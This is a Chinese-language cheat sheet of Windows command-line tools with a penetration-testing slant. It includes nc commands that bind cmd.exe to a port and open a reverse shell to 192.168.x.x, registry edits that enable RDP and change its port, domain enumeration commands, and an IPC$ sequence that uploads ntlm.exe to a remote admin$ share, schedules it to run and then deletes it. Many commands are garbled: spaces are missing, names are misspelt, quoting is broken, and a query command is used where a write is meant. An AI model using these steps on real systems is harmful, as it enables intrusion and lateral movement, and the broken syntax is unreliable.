NETSTAT
作用:显示协议统计信息和当前TCP/IP网络连接
netstat -a 显示所有连接和侦听端口
netstat -ano 显示所有连接和侦听端口,以数字形式显示进程ID
netstat -r 显示路由表(等价于 route print)
netstat -f 显示本机与外部连接(NT6.0以上)
netstat -b 拥有足够权限可以查看每个连接及侦听端口所涉及的可执行程序
netstat -p TCP 查看连接中使用的协议
NBTSTAT
作用:显示本地计算机和远程计算机的基于TCP/IP(NetBT)协议的NetBIOS统计资料、NetBIOS名称表和NetBIOS名称缓存
NBTSTAT 格式:nbtstat [-a remotename] [-A ip address] [-c] [-n] [-R] [-RR] [-s][-S]
[interval]
nbtstat -acleanxp 列出指定名称的远程机器的名称表
nbtstat -AIP 列出指定IP地址的远程机器的名称表
nbtstat -n 列出本地NetBIOS名称
nbtstat -R 清除NetBIOS名称缓存并重新装载到本地 Lmhosts(c:\windows\system32\drivers\etc\lmhosts.sam)
文件中 带标记#PRE的项目
REG(winxp提供的,可以添加、更改和显示注册表项中的注冊表子项信息和值)
REG QUERY 查询(显示注册表项setup下所有子项和值)
REG ADD 增加(添加注册表项、值)
REG DELETE 删除(删除注册表项及其所有子项和值)
REG COPY 拷贝(复制注册表项及其子项)
REG SAVE 保存(将注册表项保存到文件)
REG RESTORE 还原注册表
REG LOAD 加载注册表文件/项
REG UNLOAD 卸载配置单元的注册表项
REG COMPARE 注册表项比较
REG EXPORT 导出注册表
REG IMPORT 导入注册表
HKCR:HKEY_CLASSES_ROOT
基层类别键,用于定义系统中所有已经注册的文件扩展名、文件类型、文件图标等
HKCU:HKEY_CURRENT_USER
定义当前用户的所有权限
HKLM:HKEY_LOCAL_MACHINE
定义相对网络环境而言的本地计算机软硬件的全部信息
HKU:HKEY_USERS
定义所用的用户信息,其中部分分支将映射到HKEY_CUQQENT_USER关键字中,大部分设置都可以通过控制面板来修改
HKCC:HKEY_CURRENT_CONFIG
定义计算机的当前配置情况,实际上就是指向HKEY_LOCAL_MASHINE\Config 结构中的某个分支的指针
REGADD(将新的子项或项添加到注册表中)
语法:red addkeyName [/v EntryName|/ve] [/t Data Type]
[/s separator] [/d value][/f]
参数:keyName
指定子项的完全路径。有效子目录树为HKLM、HKCU、HKCR、HKU以及HKCC。远程机器上只有HKLM和HKU
/V EntryName 指定要添加到指定子项下的项名称
/ve 指定添加到注册表中的项为空值
/t DataType 指定项值的数据类型
DataType可以是以下几种类型:
REG-SZ
REG-MULTI-SZ
REG-DWORD-BIG-ENDIAN
REG-DWORD
REG-BINARY
REG-DWORD-LITTLE-ENDIAN
REG-LINK
REG-FULL-RESOURCE-DESCRIPTOR
REG-EXPAND-SZ
/s separator 指定用于分隔多个数据实例的字符
/d value 指定新注册表项的值
/f 不用询问信息而直接添加子项或项
/? 显示帮助
REG QUERY(返回注册表的子项下的项和下一层子项的列表)
语法:reg query keyName [{/v EntryName | /ve}][/s]
/v EntryName 返回特定的项及其值
/ve 指定仅返回为空值的项
/s 将返回各个层中的所有子项和项
查看注册表远程桌面的端口号
REG queryHKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server\WinStations\RDP-TCP /v PortNumber
开启3389
REG queryHKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server /v fDenyTSconnections /t REG-DWORD /d 00000000 /f
修改端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server\wds\rdpwd\Tds\tcp /vPortNumber /t REG-DWORD /d 0X7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlset\Control\Terminal””Server\WinStations\RDP-TCP /vPortNumber /t REG-DWORD /d 0x7d8 /f
SC(用来与服务控制管理器和服务进行通信)
sc query/queryex 查询服务的状态/查询服务的扩展状态
scconfig 更改服务的配置
sc stop 向服务发送stop请求
sc delete (从注册表中)删除服务
sc start 启动服务
sc pause 向服务发送PAUSE控制请求
sc continue 向服务发送CONTINUE控制请求
type:显示文本文件内容
rar
-a 添加文件到压缩文件
-e 解压压缩文件到当前目录
-p[密码] 设置密码
压缩: ① 【未加密】rar a F:\test\1.rar F:\temp
② 【加密】 rar a -p password F:\test\1.rar F:\temp
解压: ① rar e F:\test\1.rar E:\test
② rar e -ppassword F:\test\1.rar E:\test
nc
网络安全界的“瑞士军刀”,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据
-l 监听模式,用于入站连接
-w secs timeout的时间
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-p port 本地端口号
-v 详细输出,用两个-v可得到更详细的内容
-z 将输入输出关掉,用于扫描时
①连接到远程主机:
格式:nc -nvv 192.168.x.x 80
讲解:连接 192.168.x.x的TCP 80端口
②监听本地主机
格式:nc -l -vv -p 80
讲解:监听本机的TCP 80端口
③扫描远程主机
格式:nc -nvv -w2 -z 192.168.x.x 80 -445
讲解:扫描192.168.x.x的TCP 80到TCP 445的所有端口
④远程主机绑定shell
格式:nc -l -p 5354 -t -e c:winntsystem32 cmd.exe
讲解:绑定远程主机的cmdshell 在远程主机的TCP 5354端口
⑤远程主机绑定shell并反向连接
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解:绑定远程主机的cmdshell 并反向连接到192.168.x.x的TCP 5354端口
域命令
1、域内添加用户
net user username pass /add/domain
2、域内禁用用户
net userusername /active:no/domain
3、域内激活用户
net user username /active:yes/domain
4、域内删除用户
net user username /del/domain
5、列出域内所有的机器名
desquery computer domainroot -limit 0
net group “domain computers” /domain
6、列出域内所有的用户
dsquery user domainroot -limit 0
net user /domain
7、列出域内的内网划分
dsquery subnet
8、列出域内的所有分组
dsquery group
net group /domain
9、列出域控制器(域控,DC)
dsquery server
net group “domain controllers” /domain
10、列出域管理员用户
net group “domain admins” /domain
11、列出域列表
net view /domain
12、查看当前域活动机器列表
net view /domain:DC name
IPC$(依赖139 445端口)
场景:远程机器192.168.123.123,用户名为:administrator,密码为:abc@123
(1)建立ipc$连接
net use \\192.168.123.123\ipc$ "abc@123" /user:administrator
(一定要注意:这一行命令中包含了3个空格)
(2)列远程机器admin$目录
dir \\192.168.123.123\admin$
(3)把本地的c:\ntlm.exe文件拷贝到远程的主机上
copyc:\ntlm.exe \\192.168.123.123\admin$
(4)查看远程机器时间
nettime \\192.168.123.123
(5)在下一个时间点运行上传的文件ntlm.exe(当前时间为:14:57)
at\\192.168.123.123 15:00 ntlm.exe
(6)删除远程机器上ntlm.exe文件
del \\192.168.123.123\admin$\ntlm.exe /f/q
(7)把对方的磁盘C映射为本地的Z盘
netuse z: \\192.168.123.123\c$
(8)删除磁盘映射连接
netuse z: /del
(9)删除IPC$连接
netuse \\192.168.123.123\ipc$ /del
netuse * /del
IPC$ 依赖哪些服务
开启IPC$共享
启动lanmanworkstations服务(显示名:workstations)
启动lanmanserver服务(显示名:server)
启动netlogon
打开139、445端口
Ipc$常见的错误代码及原因
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
领取专属 10元无门槛券
私享最新 技术干货